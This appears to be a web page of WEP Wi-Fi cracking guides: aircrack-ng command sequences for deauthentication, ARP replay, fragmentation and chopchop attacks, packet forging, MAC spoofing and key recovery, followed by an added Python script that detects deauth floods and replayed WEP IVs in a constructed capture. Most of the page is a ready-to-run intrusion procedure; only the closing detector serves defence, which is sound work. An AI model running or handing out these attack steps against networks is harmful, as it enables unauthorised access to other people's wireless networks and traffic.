
airmon-ng start wlan0

airodump-ng -c "channel" --bssid "AP MAC" -w output wlan0


aireplay-ng -3 -b "AP MAC" wlan0
aireplay-ng -1 0 -e "AP NAME" -a "AP MAC" wlan0
aireplay-ng -0 10 -a "AP MAC" -c "CL MAC" wlan0
aircrack-ng -s -b "AP MAC" output*.cap
EDIT: First enable high power on your awus036h to make it inject over even greater distances: (using r8187 driver)
modprobe -r rtl8187
modprobe r8187
iwpriv wlan0 highpower 1
iwconfig wlan0 txpower 27
Now bring it up in monitor mode and follow the steps below.
1 - Start airodump on the correct channel/bssid:
airodump-ng -c CHANNELAP --bssid BSSIDAP -w dlink wlan0
2 - Try the fragmentation attack first, and if successful, it will always give you a 1500 bytes XOR file: (you might have to try a few different packets before it will work)
aireplay-ng -5 -b BSSIDAP -r dlink-01.cap wlan0
3 - If fragmentation doesn't work, try chopchop instead, but keep this in mind:
If you use a XOR file obtained from a chopchop attack, be sure it is at least 144 bytes long! Which means you should select a packet from the AP to chopchop that's at least 144 bytes, so it will result in a 144 bytes XOR file: (keystream)
aireplay-ng -4 -b BSSIDAP -r dlink-01.cap wlan0
4 - Once you get a valid XOR file, from either chopchop or fragmentation, and it's equal or bigger than 144 bytes, you can use it for fake Shared Key Authentication:
aireplay-ng -1 0 -a BSSIDAP -y NAMEOFXORFILE.xor wlan0
5 - If authentication is successful, it's time to forge an ARP packet:
packetforge-ng -0 -a BSSIDAP -h YOURCARDSMAC -k 255.255.255.255 -l 255.255.255.255 -y NAMEOFXORFILE.xor -w arp
6 - Inject your forged ARP packet:
aireplay-ng -3 -b BSSIDAP -r arp wlan0
7 - IV/data rate goes up in airodump, so you can now crack the key with aircrack:
aircrack-ng dlink*.cap
00:1E:58:9B:37:7c
NOTES
These are all different colors because they coordinate with parts of the code you will have to change when typing them.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore :
-------------------------------------------------------------------------
WEP CRACK GUIDE
1. Boot computer with Backtrack 4 (login: root, pass: toor / poweroff at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 **My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!**
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
-------------------------------------------------------------------------
ALTERNATE ATTACKS
FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
**Be sure to open new Konsoles when necessary**
http://forum.aircrack-ng.org/index.php?topic=7430.0
http://www.enigmagroup.org/articles/view/WiFi%20Hacking/2-How-to-crack-WEP
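The two injection steps that this guide relies on, the deauthentication burst (aireplay-ng -0) and the ARP replay (aireplay-ng -3 / -2), both leave a distinctive footprint in a monitor-mode capture: dozens of deauth frames carrying the AP's own address as transmitter, and one encrypted data frame re-sent over and over with the same WEP IV. The script below is an added example written for this page from the defender's side, not code from the guide or from the aircrack-ng project. It parses the 802.11 MAC header and WEP IV from raw frames, counts deauth frames per transmitter and repeated (transmitter, IV) pairs, and flags anything above a threshold. The capture it runs on is constructed inline (the MAC addresses, thresholds and frame bodies are assumptions, not values from the page), so it runs offline with no interface or pcap file.

```python
import struct
from collections import Counter

# 802.11 frame-control constants (type and subtype live in the first byte)
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_DEAUTH = 12
FLAG_PROTECTED = 0x40  # bit 6 of the second frame-control byte


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(raw):
    """Decode the 24-byte MAC header; for protected data frames also read the 3-byte WEP IV."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "protected": bool(fc1 & FLAG_PROTECTED),
        "addr1": mac_str(raw[4:10]),   # receiver
        "addr2": mac_str(raw[10:16]),  # transmitter (the address a replay or deauth tool spoofs)
        "addr3": mac_str(raw[16:22]),  # BSSID for to-DS traffic
        "iv": None,
    }
    if frame["type"] == TYPE_DATA and frame["protected"] and len(raw) >= 28:
        frame["iv"] = raw[24:27].hex()  # WEP places IV (3 bytes) + key index right after the header
    return frame


def deauth_sources(frames, threshold):
    """Transmitter addresses that sent at least `threshold` deauthentication frames."""
    counts = Counter(f["addr2"] for f in frames
                     if f and f["type"] == TYPE_MGMT and f["subtype"] == SUBTYPE_DEAUTH)
    return {mac: n for mac, n in counts.items() if n >= threshold}


def replayed_ivs(frames, threshold):
    """(transmitter, IV) pairs seen at least `threshold` times: a re-injected WEP frame keeps its IV."""
    counts = Counter((f["addr2"], f["iv"]) for f in frames if f and f["iv"] is not None)
    return {key: n for key, n in counts.items() if n >= threshold}


def analyze(raw_frames, deauth_threshold=10, replay_threshold=20):
    """Run both detectors over a list of raw frames and return what each one flagged."""
    parsed = [parse_frame(r) for r in raw_frames]
    return {
        "deauth_floods": deauth_sources(parsed, deauth_threshold),
        "replayed_frames": replayed_ivs(parsed, replay_threshold),
    }


# --- constructed sample capture (assumed addresses, not real traffic) ---------
AP = bytes.fromhex("02aabbccdd01")      # constructed BSSID
CLIENT = bytes.fromhex("02aabbccdd02")  # constructed legitimate station


def build_frame(fc0, fc1, addr1, addr2, addr3, seq, body=b""):
    """Assemble a minimal 802.11 frame: FC, duration, three addresses, sequence control, body."""
    return bytes([fc0, fc1]) + b"\x00\x00" + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body


def wep_data(src, dst, bssid, iv, seq):
    # fc0 0x08 = data frame; fc1 0x41 = to-DS + protected; body = IV, key index, dummy ciphertext
    return build_frame(0x08, 0x41, dst, src, bssid, seq, iv + b"\x00" + b"\xde\xad\xbe\xef" * 8)


SAMPLE_CAPTURE = []
# five ordinary client frames, each with a fresh IV
for i in range(1, 6):
    SAMPLE_CAPTURE.append(wep_data(CLIENT, AP, AP, bytes([0, 0, i]), seq=i))
# forty copies of one frame re-injected with the client's address and an unchanged IV
for i in range(40):
    SAMPLE_CAPTURE.append(wep_data(CLIENT, AP, AP, bytes.fromhex("0a0b0c"), seq=100 + i))
# twenty deauthentication frames carrying the AP's own address as transmitter (reason code 7)
for i in range(20):
    SAMPLE_CAPTURE.append(build_frame(0xC0, 0x00, CLIENT, AP, AP, 200 + i, b"\x07\x00"))

if __name__ == "__main__":
    print(analyze(SAMPLE_CAPTURE))
```

On the constructed capture the deauth detector reports the AP address with 20 frames and the replay detector reports the client address paired with IV 0a0b0c seen 40 times, while the five legitimately numbered IVs stay below threshold. Real deployments would feed frames from a monitor-mode capture and evaluate the counters per time window rather than over the whole file; the thresholds here are assumed values to tune against normal deauth and retransmission rates on the network being watched.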
